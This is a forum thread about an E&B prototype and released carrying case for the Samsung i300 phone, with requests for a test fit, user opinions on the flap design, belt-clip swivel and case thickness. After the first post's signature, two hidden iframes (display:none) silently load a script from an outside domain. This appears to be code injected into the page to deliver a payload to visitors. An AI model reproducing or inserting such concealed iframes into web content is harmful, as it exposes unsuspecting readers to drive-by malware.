+ Reply to Thread

E&B Case Update/Request

Hey everyone!

Small favor to ask for someone in the San Diego area. E&B has just received the prototype for their I300 case and would like to test the fit on an actual I300. The case designer is having trouble locating a machine to test it on so if anyone would be willing to stop by their office in San Diego, CA and let them borrow your phone for a few minutes, I'm sure they would very much appreciate it. Not only would you help speed up the process for getting the case out, but would obviously get a sneak peak at the new case.

I really don't want to ship my phone out again but if I have to I will to keep this process rolling.

If you would be willing to do this, please email me at mmendo1@umbc.edu and I will put you in contact with the appropraite person.

Marty<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Smile

While I'm not in a position to offer to drop my phone off, I would encourage anyone who is to help out. I have used e&B cases for my Palm devices for several years and find them to be the absolute best in cost, fit and quality. I am waiting for them to release their version before I invest in a case. I know it will be well worth waiting for!

I see that EB has released their case for the i300 on their website.

Anybody try it yet and have an opinion to share?

http://www.ebcases.com/Search.bok?ca...ung%20SPH-i300

Talking Just Ordered

I've just ordered mine. Thanks for letting us know they now have them available. They said it would be shipped withing 5-10 business days. We'll see.

I ordered the one with the belt clip. Has anyone got theirs yet?

Laurie

E&B not that great IMO

I just checked out the website. I have an older E&B case for my palmIIIx and they do make quality cases. But for a PDA/Phone, the flap case is a little awkward. For PDA use it is fine, but when the phone rings you have to unhook it from your belt, flip the flap, then hit the button. Then you have the flap flapping around while the phone is pressed against your head. Am i totally nuts here? Am I way off base?

Near perfect case

Sounds as if this case is too much hassle for phone calls. Look at my post under "Near Perfect Case" One of the only issues with this case is that it doesn't swivel, but there is enough play in the loop that goes around your belt that I have not found it to be a problem.

Peter
    Peter

My PalmV case from EB does swivel 360° around the belt clip. The belt clip for the i300 case looks to be the same one so I bet it swivels also.

Near perfect case

I am sorry I wasn't clear. What I meant was that the case I had purchased (the Lodis Case) doesn't swivel. I haven't purchased or seen the EB case, but just from the description above it sound like too much hassle for a phone call but fine for PDA use.

Peter
    Peter

Looks great to me. I'm next in line.
    Here's the pic.
    Attached Thumbnails Attached Thumbnails E&amp;B Case Update/Request-tslipperi300_1c.jpg  

Question about E&B case

How thick is the E&B case? Espically when compared to the leather case that comes with the i300 in the SprintPCS package.

I'm wondering because I carry my i300 in my front pocket with the case as protection. I'd rather not carry it without anything at all since it may get banged up even though it's in my pocket.

I used to carry my Palm Vx in the same location with the hard case which worked very well over the years. I'm just finding that the i300 with the original leather case is a little too large for comfort and was wondering if this case was any better?

Thoughts?

Thanks everyone

Administrator

Arrow

wonder whos phone they used?

at 45 bucks, i think my 10 dollar target (pronounced tar-jay for ther snobby folks ) case will do me fine... i dont care for the flap and in my email to them i specifically asked that they keep that out.. i didnt like it on the kyo 6035 case...

i will have to do a "wait and see" approach to this case....